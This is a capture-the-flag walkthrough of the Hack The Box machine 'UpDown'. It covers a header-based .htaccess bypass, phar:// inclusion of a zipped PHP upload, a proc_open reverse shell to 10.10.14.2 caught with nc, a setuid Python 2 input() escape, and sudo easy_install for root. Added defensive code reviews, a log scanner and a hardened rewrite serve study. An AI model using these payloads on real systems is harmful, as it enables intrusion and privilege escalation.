HTB — UpDown
Site availability checker with an .htaccess allowlist bypass. PHP phar deserialization for code execution, proc_open for a shell, then a setuid binary owned by developer and sudo on easy_install for root.
nmap
nmap -sC -sV -T4 -A -Pn -p- --open 10.129.227.227
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 14:14 EST
Stats: 0:00:28 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 14:15 (0:00:00 remaining)
Nmap scan report for 10.129.227.227
Host is up (0.021s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
| 256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_ 256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/19%OT=22%CT=1%CU=41185%PV=Y%DS=2%DC=T%G=Y%TM=673
OS:CE3B5%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A
OS:)SEQ(SP=103%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST11NW7%O2=M53C
OS:ST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1
OS:=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O
OS:=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N
OS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF
OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=
OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 15.99 ms 10.10.14.1
2 18.77 ms 10.129.227.227
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.15 seconds
feroxbuster
feroxbuster --url http://10.129.227.227/
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.129.227.227/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 314c http://10.129.227.227/dev => http://10.129.227.227/dev/
200 GET 320l 675w 5531c http://10.129.227.227/stylesheet.css
200 GET 40l 93w 1131c http://10.129.227.227/
[####################] - 21s 60005/60005 0s found:3 errors:0
[####################] - 20s 30000/30000 1532/s http://10.129.227.227/
[####################] - 19s 30000/30000 1550/s http://10.129.227.227/dev/
subdomain fuzzing
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt:FUZZ -u http://siteisup.htb/ -H 'Host: FUZZ.siteisup.htb' -fs 1131
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://siteisup.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
:: Header : Host: FUZZ.siteisup.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 1131
________________________________________________
dev [Status: 403, Size: 281, Words: 20, Lines: 10, Duration: 30ms]
feroxbuster --url http://siteisup.htb/dev/ -x php,txt,pdf,asp,aspx,py,js,jsp,yml,yaml,zip,rb,pl,doc,docx,xls,xlsx,conf,sql,git
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://siteisup.htb/dev/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [php, txt, pdf, asp, aspx, py, js, jsp, yml, yaml, zip, rb, pl, doc, docx, xls, xlsx, conf, sql, git]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 0l 0w 0c http://siteisup.htb/dev/
301 GET 9l 28w 315c http://siteisup.htb/dev/.git => http://siteisup.htb/dev/.git/
git directory
git-dumper http://siteisup.htb/dev/.git ./website
git log
commit 010dcc30cc1e89344e2bdbd3064f61c772d89a34 (HEAD -> main, origin/main, origin/HEAD)
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 19:38:51 2021 +0200
Delete index.php
commit c8fcc4032487eaf637d41486eb150b7182ecd1f1
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 19:38:08 2021 +0200
Update checker.php
commit f67efd00c10784ae75bd251add3d52af50d7addd
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 18:33:11 2021 +0200
Create checker.php
commit ab9bc164b4103de3c12ac97152e6d63040d5c4c6
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 18:30:58 2021 +0200
Update changelog.txt
commit 60d2b3280d5356fe0698561e8ef8991825fec6cb
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 18:30:39 2021 +0200
Create admin.php
commit c1998f8fbe683dd0bee8d94167bb896bd926c4c7
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 18:29:45 2021 +0200
Add admin panel.
commit 35a380176ff228067def9c2ecc52ccfe705de640
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 17:40:49 2021 +0200
Update changelog.txt
commit 57af03ba60cdcfe443e92c33c188c6cecb70eb10
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 17:29:42 2021 +0200
Create index.php
commit 354fe069f6205af09f26c99cfe2457dea3eb6a6c
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 17:28:48 2021 +0200
Delete .htpasswd
commit 8812785e31c879261050e72e20f298ae8c43b565
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 16:38:54 2021 +0200
New technique in header to protect our dev vhost.
commit bc4ba79e596e9fd98f1b2837b9bd3548d04fe7ab
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 16:37:20 2021 +0200
Update .htaccess
New technique in header to protect our dev vhost.
commit 61e5cc0550d44c08b6c316d4f04d3fcc7783ae71
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:45:48 2021 +0200
Update index.php
commit 3d66cd48933b35f4012066bcc7ee8d60f0069926
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:45:18 2021 +0200
Create changelog.txt
commit 4fb192727c29c158a659911aadcdcc23e4decec5
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:28:26 2021 +0200
Create stylesheet.css
commit 6f89af70fd23819664dd28d764f13efc02ecfd88
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:05:40 2021 +0200
Create index.php
commit 8d1beb1cf5a1327c4cdb271b8efb1599b1b1c87f
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:05:08 2021 +0200
Create .htpasswd
commit 6ddcc7a8ac393edb7764788c0cbc13a7a521d372
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:04:38 2021 +0200
Create .htaccess
git show
git show 6ddcc7a8ac393edb7764788c0cbc13a7a521d372
commit 6ddcc7a8ac393edb7764788c0cbc13a7a521d372
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:04:38 2021 +0200
Create .htaccess
diff --git a/.htaccess b/.htaccess
new file mode 100644
index 0000000..3190432
--- /dev/null
+++ b/.htaccess
@@ -0,0 +1,5 @@
+AuthType Basic
+AuthUserFile /var/www/dev/.htpasswd
+AuthName "Remote Access Denied"
+Require ip 127.0.0.1 ::1
+Require valid-user
git show 8d1beb1cf5a1327c4cdb271b8efb1599b1b1c87f
commit 8d1beb1cf5a1327c4cdb271b8efb1599b1b1c87f
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:05:08 2021 +0200
Create .htpasswd
diff --git a/.htpasswd b/.htpasswd
new file mode 100644
index 0000000..8b13789
--- /dev/null
+++ b/.htpasswd
@@ -0,0 +1 @@
+
git show 3d66cd48933b35f4012066bcc7ee8d60f0069926
commit 3d66cd48933b35f4012066bcc7ee8d60f0069926
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:45:18 2021 +0200
Create changelog.txt
diff --git a/changelog.txt b/changelog.txt
new file mode 100644
index 0000000..88d3109
--- /dev/null
+++ b/changelog.txt
@@ -0,0 +1,7 @@
+Beta version
+
+1- Check a bunch of websites.
+
+-- ToDo:
+
+1- Multithreading for a faster version :D.
git show 61e5cc0550d44c08b6c316d4f04d3fcc7783ae71
commit 61e5cc0550d44c08b6c316d4f04d3fcc7783ae71
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 15:45:48 2021 +0200
Update index.php
diff --git a/index.php b/index.php
index b9ba056..c41432c 100644
--- a/index.php
+++ b/index.php
@@ -1 +1,9 @@
<b>This is only for developers</b>
+<br>
+<?php
+ define("DIRECTACCESS",false);
+ $page=$_GET['page'];
+ if($page && !preg_match("/bin|usr|home|var|etc/i",$page)){
+ include($_GET['page'] . ".php");
+ }
+?>
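Review bot: the guard `if($page && !preg_match("/bin|usr|home|var|etc/i",$page))` is a denylist of directory names, so `include($_GET['page'] . ".php")` still accepts anything the list does not mention, including stream wrappers such as `phar://` and relative paths under the web root. Replace it with an allowlist of known page names (for example `in_array($page, ['admin'], true)`) and include from a fixed directory; the include should also use the already-read `$page` instead of reading `$_GET['page']` a second time.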
git show c1998f8fbe683dd0bee8d94167bb896bd926c4c7
commit c1998f8fbe683dd0bee8d94167bb896bd926c4c7
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 18:29:45 2021 +0200
Add admin panel.
diff --git a/index.php b/index.php
index c41432c..32eeeee 100644
--- a/index.php
+++ b/index.php
@@ -1,9 +1,12 @@
<b>This is only for developers</b>
<br>
+<a href="?page=admin">Admin Panel</a>
<?php
define("DIRECTACCESS",false);
$page=$_GET['page'];
if($page && !preg_match("/bin|usr|home|var|etc/i",$page)){
include($_GET['page'] . ".php");
- }
+ }else{
+ include("checker.php");
+ }
?>
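Review bot: the new `else` branch includes checker.php both when no page was requested and when the denylist rejected one, so a rejected value is silently served the checker instead of an error; respond with a 400 or 404 for rejected input and keep the default page as the explicit no-parameter case. The `include($_GET['page'] . ".php")` line is carried over unchanged in this hunk, so the allowlist fix from the previous commit is still outstanding.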
git show 60d2b3280d5356fe0698561e8ef8991825fec6cb
commit 60d2b3280d5356fe0698561e8ef8991825fec6cb
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 18:30:39 2021 +0200
Create admin.php
diff --git a/admin.php b/admin.php
new file mode 100644
index 0000000..940a317
--- /dev/null
+++ b/admin.php
@@ -0,0 +1,7 @@
+<?php
+if(DIRECTACCESS){
+ die("Access Denied");
+}
+
+#ToDo
+?>
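Review bot: `if(DIRECTACCESS)` only blocks direct requests by accident. index.php defines the constant as `false` before including this file, so the branch never fires through the front controller, and on a direct request to admin.php the constant is undefined: PHP 7 warns and substitutes the string "DIRECTACCESS" (truthy, so the die happens), PHP 8 throws an Error. Write the intent explicitly: `if(!defined('DIRECTACCESS')) { die("Access Denied"); }`, and use the same guard in checker.php.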
.htaccess
- need this special header to interact with dev.siteisup.htb
cat .htaccess
SetEnvIfNoCase Special-Dev "only4dev" Required-Header
Order Deny,Allow
Deny from All
Allow from env=Required-Header
- in Burp, add this header (Special-Dev: only4dev) to every request to dev.siteisup.htb
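
Both the exposed /dev/.git/ directory found above and the phar:// include used later on this box leave traces in the web server's access log. The block below is an added example and not part of the original writeup: a small Python scanner over Apache combined-format lines that flags requests into .git metadata, stream wrappers in query parameters, and path traversal. The log lines are constructed for the example and modelled on the requests made in this writeup; the wrapper list is my own choice.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined" LogFormat; the sample lines below are constructed to match it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# PHP stream wrappers that have no business in a value that reaches include().
WRAPPERS = ("phar://", "php://", "data://", "file://", "zip://", "expect://", "glob://")


def classify(line):
    """Return the findings for one access-log line; an empty list means benign."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path)
    findings = []
    # Exposed VCS metadata: any request into a .git directory (e.g. /dev/.git/HEAD).
    if re.search(r"(^|/)\.git(/|$)", path):
        findings.append("git-metadata")
    # Include-style parameters carrying a stream wrapper or path traversal.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        v = unquote(value).lower()   # second decode catches %252e-style double encoding
        if any(v.startswith(w) for w in WRAPPERS):
            findings.append(f"wrapper:{key}")
        if "../" in v or "..\\" in v:
            findings.append(f"traversal:{key}")
    return findings


def scan(lines):
    """Map (client ip, request target) -> findings for every line that is not benign."""
    report = {}
    for line in lines:
        findings = classify(line)
        if findings:
            m = LOG_RE.match(line)
            key = (m.group("ip"), m.group("target")) if m else ("?", line[:60])
            report[key] = findings
    return report


# Constructed sample log (not real server data).
SAMPLE_LOG = [
    '10.10.14.2 - - [19/Nov/2024:14:20:01 -0500] "GET /dev/ HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '10.10.14.2 - - [19/Nov/2024:14:20:05 -0500] "GET /dev/.git/HEAD HTTP/1.1" 200 23 "-" "git-dumper"',
    '10.10.14.2 - - [19/Nov/2024:14:25:17 -0500] "GET /?page=phar://uploads/abc/info.txt/info HTTP/1.1" 200 5120 "-" "python-requests/2.27"',
    '10.10.14.2 - - [19/Nov/2024:14:25:40 -0500] "GET /?page=../../etc/passwd HTTP/1.1" 200 312 "-" "curl/7.88"',
    '10.10.14.2 - - [19/Nov/2024:14:26:00 -0500] "GET /?page=admin HTTP/1.1" 200 1131 "-" "Mozilla/5.0"',
    '10.10.14.2 - - [19/Nov/2024:14:26:30 -0500] "GET /?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 312 "-" "curl/7.88"',
]

if __name__ == "__main__":
    for (ip, target), findings in scan(SAMPLE_LOG).items():
        print(f"{ip} {target} -> {', '.join(findings)}")
```

The Special-Dev header itself is not recorded by the combined format; if you want to see who is sending it, add `%{Special-Dev}i` to the LogFormat on the server side and extend the regex accordingly.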


checker.php
git show f67efd00c10784ae75bd251add3d52af50d7addd
commit f67efd00c10784ae75bd251add3d52af50d7addd
Author: Abdou.Y <84577967+ab2pentest@users.noreply.github.com>
Date: Wed Oct 20 18:33:11 2021 +0200
Create checker.php
diff --git a/checker.php b/checker.php
new file mode 100644
index 0000000..aa9aa44
--- /dev/null
+++ b/checker.php
@@ -0,0 +1,116 @@
+<?php
+if(DIRECTACCESS){
+ die("Access Denied");
+}
+?>
+<!DOCTYPE html>
+<html>
+
+ <head>
+ <meta charset='utf-8' />
+ <meta http-equiv="X-UA-Compatible" content="chrome=1" />
+ <link rel="stylesheet" type="text/css" media="screen" href="stylesheet.css">
+ <title>Is my Website up ? (beta version)</title>
+ </head>
+
+ <body>
+
+ <div id="header_wrap" class="outer">
+ <header class="inner">
+ <h1 id="project_title">Welcome,<br> Is My Website UP ?</h1>
+ <h2 id="project_tagline">In this version you are able to scan a list of websites !</h2>
+ </header>
+ </div>
+
+ <div id="main_content_wrap" class="outer">
+ <section id="main_content" class="inner">
+ <form method="post" enctype="multipart/form-data">
+ <label>List of websites to check:</label><br><br>
+ <input type="file" name="file" size="50">
+ <input name="check" type="submit" value="Check">
+ </form>
+
+<?php
+
+function isitup($url){
+ $ch=curl_init();
+ curl_setopt($ch, CURLOPT_URL, trim($url));
+ curl_setopt($ch, CURLOPT_USERAGENT, "siteisup.htb beta");
+ curl_setopt($ch, CURLOPT_HEADER, 1);
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+ curl_setopt($ch, CURLOPT_TIMEOUT, 30);
+ $f = curl_exec($ch);
+ $header = curl_getinfo($ch);
+ if($f AND $header['http_code'] == 200){
+ return array(true,$f);
+ }else{
+ return false;
+ }
+ curl_close($ch);
+}
+
+if($_POST['check']){
+
+ # File size must be less than 10kb.
+ if ($_FILES['file']['size'] > 10000) {
+ die("File too large!");
+ }
+ $file = $_FILES['file']['name'];
+
+ # Check if extension is allowed.
+ $ext = getExtension($file);
+ if(preg_match("/php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i",$ext)){
+ die("Extension not allowed!");
+ }
+
+ # Create directory to upload our file.
+ $dir = "uploads/".md5(time())."/";
+ if(!is_dir($dir)){
+ mkdir($dir, 0770, true);
+ }
+
+ # Upload the file.
+ $final_path = $dir.$file;
+ move_uploaded_file($_FILES['file']['tmp_name'], "{$final_path}");
+
+ # Read the uploaded file.
+ $websites = explode("\n",file_get_contents($final_path));
+
+ foreach($websites as $site){
+ $site=trim($site);
+ if(!preg_match("#file://#i",$site) && !preg_match("#data://#i",$site) && !preg_match("#ftp://#i",$site)){
+ $check=isitup($site);
+ if($check){
+ echo "<center>{$site}<br><font color='green'>is up ^_^</font></center>";
+ }else{
+ echo "<center>{$site}<br><font color='red'>seems to be down :(</font></center>";
+ }
+ }else{
+ echo "<center><font color='red'>Hacking attempt was detected !</font></center>";
+ }
+ }
+
+ # Delete the uploaded file.
+ @unlink($final_path);
+}
+
+function getExtension($file) {
+ $extension = strrpos($file,".");
+ return ($extension===false) ? "" : substr($file,$extension+1);
+}
+?>
+ </section>
+ </div>
+
+ <div id="footer_wrap" class="outer">
+ <footer class="inner">
+ <p class="copyright">siteisup.htb (beta)</p><br>
+ <a class="changelog" href="changelog.txt">changelog.txt</a><br>
+ </footer>
+ </div>
+
+ </body>
+</html>
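Review bot: the upload handling is the weak point of this hunk. `getExtension()` looks only at the text after the last dot and the check is a denylist, so any name not ending in a listed extension is accepted; the file is then written under the web-served `uploads/` directory into a directory named `md5(time())`, which is predictable to the second, and it is only removed after every site in the list has been checked (each with a 30 s curl timeout). The list never needs to touch the document root: read it straight from `$_FILES['file']['tmp_name']`, or store uploads outside the web root and validate each line as an http(s) URL. Two smaller points: `curl_close($ch)` in `isitup()` sits after both return statements and is never reached, and the per-line scheme filter denies only `file://`, `data://` and `ftp://`, so the checker will fetch any other URL, internal addresses included.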
echo '<?php phpinfo();?>' > info.php
zip info.zip info.php
mv info.zip info.txt


- A tool like dfunc-bypasser.py will read phpinfo() output and show which exec-capable functions are still enabled.
- https://github.com/teambi0s/dfunc-bypasser
- add this to the code so its request carries the dev header:
if(args.url):
    url = args.url
    phpinfo = requests.get(url,headers={"Special-dev":"only4dev"}).text
python2 dfunc-bypasser.py --url "http://dev.siteisup.htb/?page=phar://uploads/c0f5a42d.../info.txt/info"
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
,---,
.' .' `\
,---.' \
| | .`\ |
: : | ' |
| ' ' ; :
' | ; . |
| | : | '
' : | / ;
| | '` ,/
; : .'
| ,.'
'---'
authors: __c3rb3ru5__, $_SpyD3r_$
Please add the following functions in your disable_functions option:
proc_open
If PHP-FPM is there stream_socket_sendto,stream_socket_client,fsockopen can also be used to be exploit by poisoning the request to the unix socket
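The same check can be reproduced offline against a saved phpinfo() page, which is how a defender audits their own disable_functions. The block below is an added example, not dfunc-bypasser's code: it extracts the local disable_functions value and Server API from phpinfo() output (either the HTML table or the CLI `name => local => master` form) and reports which exec-capable functions remain callable. The function lists are my own choice (the FPM set is the one named in the tool output above), and the sample phpinfo fragment is constructed so that, as on this box, proc_open is the one left enabled.

```python
import re
from html import unescape

# Command-execution primitives worth disabling (my own list), plus the FPM socket
# functions that dfunc-bypasser's output mentions.
EXEC_FUNCS = ["system", "exec", "shell_exec", "passthru", "popen", "proc_open",
              "pcntl_exec", "mail", "putenv", "dl"]
FPM_FUNCS = ["stream_socket_sendto", "stream_socket_client", "fsockopen"]


def _directive(text, name):
    """Local value of a phpinfo() directive, from the HTML table row or the CLI
    'name => local => master' line. Returns None if the directive is absent."""
    m = re.search(rf"{re.escape(name)}\s*</td>\s*<td[^>]*>([^<]*)</td>", text, re.I)
    if not m:
        m = re.search(rf"^{re.escape(name)}\s*=>\s*([^=\n]*?)\s*(?:=>|$)", text, re.I | re.M)
    if not m:
        return None
    value = unescape(m.group(1)).strip()
    return "" if value == "no value" else value


def parse_disabled(text):
    """Set of names in disable_functions, or None when the directive is missing."""
    raw = _directive(text, "disable_functions")
    if raw is None:
        return None
    return {f.strip().lower() for f in raw.split(",") if f.strip()}


def audit(text):
    """Report which dangerous functions are still callable according to phpinfo()."""
    disabled = parse_disabled(text)
    if disabled is None:
        return {"error": "disable_functions not found"}
    api = _directive(text, "Server API") or ""
    missing = [f for f in EXEC_FUNCS if f not in disabled]
    # The socket functions only matter when PHP runs under FPM.
    fpm_missing = [f for f in FPM_FUNCS if f not in disabled] if "fpm" in api.lower() else []
    return {"server_api": api, "disabled": sorted(disabled),
            "missing": missing, "fpm_missing": fpm_missing}


# Constructed phpinfo() HTML fragment (not captured from the box).
SAMPLE_PHPINFO = """<tr><td class="e">Server API </td><td class="v">Apache 2.0 Handler </td></tr>
<tr><td class="e">disable_functions</td><td class="v">pcntl_alarm,pcntl_fork,exec,passthru,shell_exec,system,popen,mail,putenv,dl,pcntl_exec</td><td class="v">pcntl_alarm,pcntl_fork,exec,passthru,shell_exec,system,popen,mail,putenv,dl,pcntl_exec</td></tr>"""

if __name__ == "__main__":
    result = audit(SAMPLE_PHPINFO)
    print("Server API:", result["server_api"])
    print("Still enabled:", ", ".join(result["missing"]) or "none")
```

Run it against `php -i` output or a saved phpinfo() page; an empty `missing` list is the goal, and anything in `fpm_missing` matters only when Server API reports FPM.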
rev shell
rev.php
<?php
$descriptorspec = array(
0 => array('pipe', 'r'), // stdin
1 => array('pipe', 'w'), // stdout
2 => array('pipe', 'a') // stderr
);
$cmd = "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.2/80 0>&1'";
$process = proc_open($cmd, $descriptorspec, $pipes, null, null);
?>
zip rev.zip rev.php
mv rev.zip rev.txt
nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.2] from (UNKNOWN) [10.129.227.227] 59846
bash: cannot set terminal process group (894): Inappropriate ioctl for device
bash: no job control in this shell
www-data@updown:/var/www/dev$ whoai
whoai
Command 'whoai' not found, did you mean:
command 'whoami' from deb coreutils (8.30-3ubuntu2)
Try: apt install <deb name>
www-data@updown:/var/www/dev$ whoami
whoami
www-data
There are two files in the dev folder: a Python script and a setuid executable. When an executable has the setuid bit set, it runs as the owner of the file, in this case developer. The contents of the Python script are as follows.
www-data@updown:/home/developer/dev$ cat siteisup_test.py
cat siteisup_test.py
import requests
url = input("Enter URL here:")
page = requests.get(url)
if page.status_code == 200:
print "Website is up"
else:
print "Website is down"
- the script reads the URL with Python 2's input(), which evaluates whatever is typed, so the line below runs a shell as the user the script executes as:
__import__('os').system('/bin/bash')
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwsr-x--- 1 developer www-data 17K Jun 22 2022 /home/developer/dev/siteisup (Unknown SUID binary!)
www-data@updown:/home/developer/dev$ /home/developer/dev/siteisup
/home/developer/dev/siteisup
__import__('os').system('/bin/bash')
whoami
developer
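siteisup_test.py above reads the URL with Python 2's input(), which is eval(raw_input()), so the text typed in is executed rather than checked, and the setuid wrapper then hands that execution to developer. As an added example (not the box's script), here is what the checker looks like in Python 3 when the input is treated as data: the scheme is allowlisted, a host is required, and the HTTP fetch is injectable so the decision logic can be tested without a network. The names validate_url and check_site are my own.

```python
import sys
from urllib.parse import urlsplit
from urllib.request import urlopen
from urllib.error import URLError

ALLOWED_SCHEMES = ("http", "https")


def validate_url(raw):
    """Accept only an absolute http(s) URL with a host; reject everything else.
    The value is data and is never evaluated, unlike Python 2's input()."""
    url = raw.strip()
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme or '(none)'}")
    if not parts.hostname:
        raise ValueError("missing host")
    if parts.username or parts.password:
        raise ValueError("credentials in URL not allowed")
    return url


def check_site(url, fetch=None):
    """Return 'up' or 'down' for an already-validated URL. `fetch` returns the
    HTTP status for a URL; the default uses urllib and follows redirects, as the
    original curl-based checker did."""
    if fetch is None:
        def fetch(u):
            with urlopen(u, timeout=10) as resp:
                return resp.status
    try:
        return "up" if fetch(url) == 200 else "down"
    except (URLError, OSError, ValueError):
        return "down"


def main(argv):
    # Python 3 input() returns the typed text as a string; nothing evaluates it.
    raw = argv[1] if len(argv) > 1 else input("Enter URL here:")
    try:
        url = validate_url(raw)
    except ValueError as err:
        print(f"Rejected: {err}")
        return 2
    print("Website is up" if check_site(url) == "up" else "Website is down")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Even with the input fixed, a setuid wrapper around an interpreter is still a poor design: the interpreter inherits the caller's environment and working directory, so the privilege boundary should live in a service or a sudo rule with a fixed command line, not in a setuid bit.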
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
ssh -i id_rsa developer@10.129.227.227
user.txt
developer@updown:~$ cat user.txt
ce20af21...
priv esc
sudo
developer@updown:~$ sudo -l
Matching Defaults entries for developer on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User developer may run the following commands on localhost:
(ALL) NOPASSWD: /usr/local/bin/easy_install
gtfobins easy_install
developer@updown:~$ TF=$(mktemp -d)
developer@updown:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
developer@updown:~$ sudo /usr/local/bin/easy_install $TF
WARNING: The easy_install command is deprecated and will be removed in a future version.
Processing tmp.RzxGgWYZ3q
